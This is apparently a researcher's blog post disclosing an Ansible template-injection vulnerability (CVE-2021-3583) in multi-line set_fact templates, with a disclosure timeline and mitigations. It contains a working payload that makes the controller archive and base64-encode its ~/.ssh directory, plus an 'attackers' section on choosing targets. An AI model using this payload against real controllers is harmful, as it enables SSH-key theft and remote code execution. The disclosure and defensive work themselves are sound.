Intro
Ansible is a host and infrastructure management tool used by many of the DevOps engineers I have worked with in my career. I have really fallen in love with using it myself, and I am working on automating a number of things in my personal and professional life with it. While doing so, I stumbled across a vulnerability in Ansible, which helped me realize how high-value a target Ansible controllers ought to be considered by the organizations that use them to manage production infrastructure.
Discovery
The Controller Crash
I was working in the lab, late one night
When my eyes beheld an eerie sight
From the console tab, errors began to rise
And suddenly to my surprise
it was a controller crash
(The controller crash) It was a template execing crash
(Debug the crash) when using a vertical slash
(I fixed the crash) one-liners still look like trash
Ansible Primer
Ansible is one of those tools that’s basically a full-fledged programming language pretending to be a YAML config. Ansible can run the same tasks against a variety of different hosts, and facts are what it calls host-specific variables. Ansible Galaxy is also mentioned in this post and is essentially a package manager for sharing Ansible playbooks. YAML has several more niche features than one might expect, and one of the more common ones is its multi-line string feature, which lets you split a long string across several lines.
How the issue presented itself
I was trying to make an Ansible playbook to merge different Packer templates into one, and some of the Jinja2 filters in Ansible were getting pretty complex.
To make things a bit clearer in the code, I decided to use YAML’s multi-line string feature in some of my set_fact tasks.
When I did so, however, I started to get an error like the following:
After some debugging, I switched to using only single-line YAML strings, and the issue went away, so I moved on to the next part of my project. There was still a nagging feeling about the error as I moved on, though. The error never came up in any of my other playbooks with multi-line Jinja2 filters, so why would it be happening here? Why would the error mention Go-style templates instead of Ansible’s Jinja2-style templates? When I started to realize what that error was actually saying, I began to look at the issue from the perspective of a security researcher instead of an end user.
The error was coming up because the Packer templates being set in facts contain Go templates, which use the same {{ }} delimiters as Jinja2, and the Ansible controller was trying to evaluate them.
It seemed that facts were evaluated as templates only when the payload was in the output of a multi-line YAML template in a set_fact task.
Speculation For Cause
I haven’t really dug into Ansible’s code to figure out why this happens yet.
These unwanted template evaluations seem to happen only when the payload is in the final output of a template evaluated as part of a set_fact task.
This means that the template evaluation is not occurring at each intermediate step of evaluating the template, as I had initially wondered.
This leads me to believe that template evaluation logic is applied both when parsing a multi-line string and again in the set_fact evaluation logic, which takes the output of the multi-line template evaluation as input.
It’s interesting to me that this issue doesn’t seem to present itself in copy tasks where the content parameter includes a multi-line YAML template.
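To make that guess a bit more concrete, here is a toy Python sketch of what "evaluating the output a second time" would look like. The render function, the variable names, and the two-pass flow are all stand-ins I made up for illustration; this is not Jinja2 and not Ansible’s code, just a model of the behavior I suspect.

```python
import re

# Toy stand-in for a template engine: replaces {{ name }} with a value from
# `variables`. This is NOT Jinja2 and NOT Ansible's code; it only models the
# idea of rendering a string once versus twice.
PLACEHOLDER = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def render(template: str, variables: dict) -> str:
    """Substitute each {{ name }} with str(variables[name]) in a single pass."""
    return PLACEHOLDER.sub(lambda m: str(variables[m.group(1)]), template)


variables = {
    # Attacker-controlled data that happens to look like a template.
    "untrusted": "{{ secret }}",
    # Something only the controller should be able to read.
    "secret": "controller-only value",
}

playbook_template = "value from host: {{ untrusted }}"

# Intended behavior: the untrusted value is inserted as plain text.
rendered_once = render(playbook_template, variables)

# Suspected bug: the already-rendered output is treated as a template again.
rendered_twice = render(rendered_once, variables)

print(rendered_once)   # value from host: {{ secret }}
print(rendered_twice)  # value from host: controller-only value
```

The first pass leaves the attacker’s text inert; it only becomes dangerous when something downstream renders that output again.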
Vulnerable Example
The playbook below demonstrates the difference between how single-line and multi-line templates are handled.
The playbook reads and parses the file at /tmp/payload.json, adds a field to the object, and writes the contents to /tmp/output_*.json files.
The /tmp/output_safe.json file represents the behavior when using single-line fact-setting templates, and its unsafe counterpart uses a multi-line template.
The payload in the example will allow a targeted host to read the ~/.ssh directory of the controller running the playbook, but it could be used for plain-old RCE as well.
poc_playbook.yaml
payload.json
{
"ssh_keys":"{{ lookup(\"pipe\", \"tar -czf - $HOME/.ssh/ 2>/dev/null | base64 -w0 \") }}"
}
Demo
$ ansible-playbook poc.yml
PLAY [Template injection example] **********************************************
TASK [Gathering Facts] *********************************************************
ok: [localhost]
TASK [Prepare the host by setting it up with the payload] **********************
ok: [localhost]
TASK [Read the payload from the remote server] *********************************
ok: [localhost]
TASK [Add an element to the payload file safely] *******************************
ok: [localhost]
TASK [Write the safe config] ***************************************************
changed: [localhost]
TASK [Combine and write the config safely] *************************************
changed: [localhost]
TASK [Add an element to the payload file unsafely] *****************************
ok: [localhost]
TASK [Write the unsafe config] *************************************************
changed: [localhost]
TASK [Install the package "jq"] ************************************************
ok: [localhost]
TASK [Read the result of the payload] ******************************************
changed: [localhost]
TASK [Output the payload results] **********************************************
ok: [localhost] => {
"msg": "<REDACTED CONTENTS OF MY ~/.ssh DIRECTORY>"
}
PLAY RECAP *********************************************************************
localhost : ok=10 changed=3 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
Impact
In a worst-case scenario such as the one demonstrated in the above example, an attacker could leverage an unprivileged position on a compromised host to escalate their privileges to those of the controller. Ansible controllers often hold broad privileges in an environment and will, at a minimum, yield control over the other hosts they manage. Ansible controllers are also often just running on engineer workstations without any protections. I am not personally familiar with all of the mitigations that Red Hat’s enterprise offering, Ansible Tower, may provide against such an attack. The fact that Ansible Tower is a multitenant execution environment likely means that it offers the option to restrict the impact of a compromised Ansible playbook by isolating playbook executions and their privileges from each other.
Exploitation
For Organizations wondering if they are vulnerable
I was only mildly concerned by this for my use case because the Packer templates I was using were also files on the controller that I own.
Many Ansible users will likely not be in the same situation, as their facts come from less trustworthy sources, like the hosts that are being managed.
Others will also not have the benefit of routinely using Ansible template characters in their fact contents, which would trigger an error to alert them the way it did for me.
The set_fact module is very commonly used in Ansible, and multi-line YAML strings are a relatively common way to represent complex operations like the ones that might be in a set_fact task.
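If your facts come from hosts you don’t fully trust, one cheap check is to look for Jinja2 delimiters in the data before it goes anywhere near a template. Below is a rough Python sketch, assuming the data has already been parsed into dicts, lists, and strings (for example with json.load). The name find_template_markers and the $-style paths are made up for illustration, and a match only means the value deserves a closer look, not that it is malicious.

```python
import re

# Jinja2's default opening delimiters: {{ (expression), {% (statement), {# (comment).
JINJA_MARKERS = re.compile(r"\{\{|\{%|\{#")


def find_template_markers(value, path="$"):
    """Return the path of every string in `value` that contains a Jinja2 opening delimiter.

    Only values are inspected, not dictionary keys.
    """
    hits = []
    if isinstance(value, str):
        if JINJA_MARKERS.search(value):
            hits.append(path)
    elif isinstance(value, dict):
        for key, item in value.items():
            hits.extend(find_template_markers(item, f"{path}.{key}"))
    elif isinstance(value, list):
        for index, item in enumerate(value):
            hits.extend(find_template_markers(item, f"{path}[{index}]"))
    return hits


# Hypothetical host-provided data with a harmless template expression in it.
sample = {
    "name": "web01",
    "ssh_keys": "{{ 7 * 7 }}",
    "tags": ["prod", "{% raw %}"],
}

print(find_template_markers(sample))  # ['$.ssh_keys', '$.tags[1]']
```

Legitimate data can contain these characters too (my Packer templates did), so this is better suited to raising a flag for review than to blocking anything outright.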
For Attackers who have compromised a host
Even with the high likelihood of this issue being exploitable in some form in many environments, this will be relatively difficult to pull off in the wild. I think that the attacker in the right situation could find it the perfect fit though. Attackers need to consider the following things when assessing if a compromised host will be able to utilize this vulnerability to escalate privileges in their target environment:
- Is the host being managed by Ansible?
  - Ansible’s architecture does not require any sort of agent to be installed on the target hosts; it all operates over a standard SSH connection. One detection method could be to watch the tmp directory for files that look like the ones Ansible copies when it runs a command against a host.
  - Is the host actually being managed by a remote host, or is Ansible installed locally?
- Is the controller running a vulnerable version of Ansible?
  - I want to do more research into what attackers can do to fingerprint the controller connecting to them, but right now it’s unpatched and all fair game.
- Is the controller likely to be processing any of the facts provided by my host in the manner described in this post?
  - This is probably the most difficult part. Since most of Ansible’s logic takes place on the controller, it will be very difficult to tell what the controller is really doing with the facts you provide it.
  - It could be helpful to find out which Ansible Galaxy playbooks already do the things that are happening to your host and review whether there are any multi-line set_fact tasks in them.
  - Try to infer whether any of the facts controlled by your host are likely to be processed by complex playbooks that might make use of intermediary facts generated from multi-line templates.
If so, it sounds like it might actually work! The example payload I provided shows all you need to get a basic RCE if the fact is pretty straightforward.
Other scenarios
Technically this is possible for anyone who is able to influence a value that ends up in a fact generated from a multi-line template. It might be useful to review popular Ansible Galaxy playbooks to see if any of them trust a property that you can control in your particular environment. For example, if you are aware that a PaaS heavily uses Ansible to manage its users’ infrastructure, then providing Jinja2 filter payloads in available inputs could be a lucrative venture.
Disclosure
Timeline
- (2021-05-29) Discovered the issue
- (2021-05-30) Reported the issue to security@ansible.com per Ansible docs
- (2021-06-02) Provided an example reproducing the issue
- (2021-06-07) Red Hat confirms the flaw and assigns CVE-2021-3583
I haven’t heard anything about a patch yet, but Red Hat said “Since the issue is already public, I believe its ok for you to publish it in your blog now.” when I asked so shrug.
Similar Issues in Ansible
When I looked into it, I found that Ansible has a bit of a history of template injection issues. This is to be expected, though, as template evaluation is a core feature and template injection is a tough issue to solve. Here are some Ansible CVEs that have the same CVSS score as mine and feel related from a brief look at their titles:
TODO: will link to similar CVEs
Future work
I haven’t really researched whether this problem shows up in other Ansible modules, so that could yield more findings. I am also interested in looking into tactics that an attacker in a black-box scenario could use to identify that they are running on a host that is being managed insecurely, so that they could use this technique effectively. Ansible Tower’s attack surface is also very interesting to me: I would like to see which of the long-term mitigations detailed below are implemented, and to understand what other mitigations they were able to think of.
Mitigations
Small-picture
Patch Ansible controllers when released
Ansible isn’t patched against this at time of writing, but update when a patch comes out.
Make Playbooks safe
Don’t use multi-line YAML strings in your Ansible playbooks for the time being, I guess?
The caveat is that it’s only exploitable when the multi-line template is in a set_fact task and the output includes attacker-controlled values.
YAML multi-line strings come in several forms, so check out https://yaml-multiline.info/ for more info.
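To find candidates for review, something like the following Python sketch could flag multi-line block scalars that sit directly under a set_fact task. It is a line-based heuristic rather than a real YAML parser, the name find_multiline_set_facts is hypothetical, and it assumes the usual indentation-based task layout, so expect both misses and false positives.

```python
import re

# "set_fact:" or "ansible.builtin.set_fact:" as a task key, optionally
# preceded by the "- " of a list item. The "key" group marks its column.
SET_FACT = re.compile(
    r"^\s*(?:-\s+)?(?P<key>(?:ansible\.builtin\.)?set_fact):\s*$"
)
# "name: |" or "name: >", with optional chomping/indentation indicators.
BLOCK_SCALAR = re.compile(r"^\s*[\w.]+:\s*[|>][+\-\d]*\s*$")


def find_multiline_set_facts(playbook_text):
    """Return 1-based line numbers of block scalars nested under set_fact keys."""
    hits = []
    fact_column = None  # column of the current set_fact key, if we are inside one
    for number, line in enumerate(playbook_text.splitlines(), start=1):
        stripped = line.lstrip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(line) - len(stripped)
        match = SET_FACT.match(line)
        if match:
            fact_column = match.start("key")
            continue
        if fact_column is not None:
            if indent <= fact_column:
                fact_column = None  # dedented: we left the set_fact mapping
            elif BLOCK_SCALAR.match(line):
                hits.append(number)
    return hits


sample_playbook = """\
- hosts: all
  tasks:
    - name: Single-line template
      set_fact:
        merged: "{{ a | combine(b) }}"
    - name: Multi-line template
      ansible.builtin.set_fact:
        merged: >-
          {{ a | combine(b) }}
    - name: Multi-line content outside set_fact
      copy:
        content: |
          hello
"""

print(find_multiline_set_facts(sample_playbook))  # [8]
```

Only the set_fact task with the folded scalar is reported; the single-line template and the copy task are left alone, which matches the caveat above.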
Big-picture
TODO: I'll be providing more details in these recommendations as I get the energy, bear with me
Template injections like the one I stumbled across are unfortunately common in Ansible and should be treated as an eventuality by organizations hoping to be proactive about 0day attacks or wanting to compensate for poor patching practices. Consider the value Ansible presents as a target for privilege escalation in your environment. The industry really needs to start thinking about the tools we use to manage production environments as being part of our production environment’s security ecosystem. The following are some mitigations we can put in place for when a controller is eventually compromised by either an insider threat or a vulnerability:
Secure Development Procedures for Ansible Playbooks
Organizations that aren’t already doing so should expand the scope of their security reviews to include their deployment logic and infrastructure. For one, the more transparency the security team has into the things they are protecting, the more perspective they will have when reviewing the system and the higher-quality recommendations they will be able to provide. For this issue specifically, barring an accident, there would be no real way for a security team to identify it unless playbooks themselves are in scope for review. Even in the absence of vulnerabilities, executing unreviewed Ansible playbooks against production environments could be very dangerous from an insider-risk perspective, depending on the organization’s tolerance for things like that.